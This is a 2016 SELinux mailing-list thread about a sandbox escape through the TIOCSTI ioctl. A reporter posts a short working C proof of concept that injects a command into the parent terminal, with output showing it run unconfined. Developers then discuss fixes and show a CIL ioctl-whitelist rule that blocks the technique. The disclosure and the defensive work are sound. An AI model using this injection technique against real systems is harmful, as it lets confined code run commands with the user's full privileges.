On 09/23/2016 09:38 AM, Stephen Smalley wrote:
> On 09/23/2016 09:28 AM, Paul Moore wrote:
>> On Fri, Sep 23, 2016 at 5:23 AM, <up201407890@xxxxxxxxxxxxxxxxxxx> wrote:
>>> Hi,
>>>
>>> When executing a program via the SELinux sandbox, the nonpriv session can
>>> escape to the parent session by using the TIOCSTI ioctl to push characters
>>> into the terminal's input buffer, allowing an attacker to escape the
>>> sandbox.
>>>
>>> $ cat test.c
>>> #include <unistd.h>
>>> #include <sys/ioctl.h>
>>>
>>> int main()
>>> {
>>> char *cmd = "id\n";
>>> while(*cmd)
>>> ioctl(0, TIOCSTI, cmd++);
>>> execlp("/bin/id", "id", NULL);
>>> }
>>>
>>> $ gcc test.c -o test
>>> $ /bin/sandbox ./test
>>> id
>>> uid=1000 gid=1000 groups=1000
>>> context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
>>> $ id <------ did not type this
>>> uid=1000(saken) gid=1000(saken) groups=1000(saken)
>>> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
>>
>> I've only just started looking at this, but it seems like we need a
>> call to tcflush()/ioctl(TCFLSH) in the sandbox tool immediately after
>> the sandboxed process exits. Do any of the userspace tools guys have
>> any other ideas?
>
> Normally this is handled via setsid() or via a pty interposer.
> seunshare does call setsid(), so I believe that sandbox -X or -M are not
> susceptible to this, but sandbox without those options does not use
> seunshare. run_init for example uses a pty interposer. Another
> alternative would be to use the ioctl whitelisting support added by
> Android to block use of TIOCSTI by the sandbox domains, but it is
> unclear if that is sufficient.
So, for example, to block this via ioctl whitelisting, on a system whose
checkpolicy and kernel supports policy version 30, I can do this:
$ cat sandbox_tiocsti.cil
(allowx sandbox_domain ptynode (ioctl chr_file (not (0x5412))))
$ sudo semodule -i sandbox_tiocsti.cil
$ sandbox ./test
uid=1000 gid=1000 groups=1000
context=unconfined_u:unconfined_r:sandbox_t:s0:c466,c667
(note that we do not get the second output from the parent, and this
output was run in the context of the sandbox domain)
And we get the following AVC from the kernel:
type=AVC msg=audit(1474638454.617:6045): avc: denied { ioctl } for
pid=2935 comm="test" path="/dev/pts/0" dev="devpts" ino=3 ioctlcmd=5412
scontext=unconfined_u:unconfined_r:sandbox_t:s0:c72,c552
tcontext=unconfined_u:object_r:user_devpts_t:s0 tclass=chr_file permissive=0
_______________________________________________
Selinux mailing list
Selinux@xxxxxxxxxxxxx
To unsubscribe, send email to Selinux-leave@xxxxxxxxxxxxx.
To get help, send an email containing "help" to Selinux-request@xxxxxxxxxxxxx.
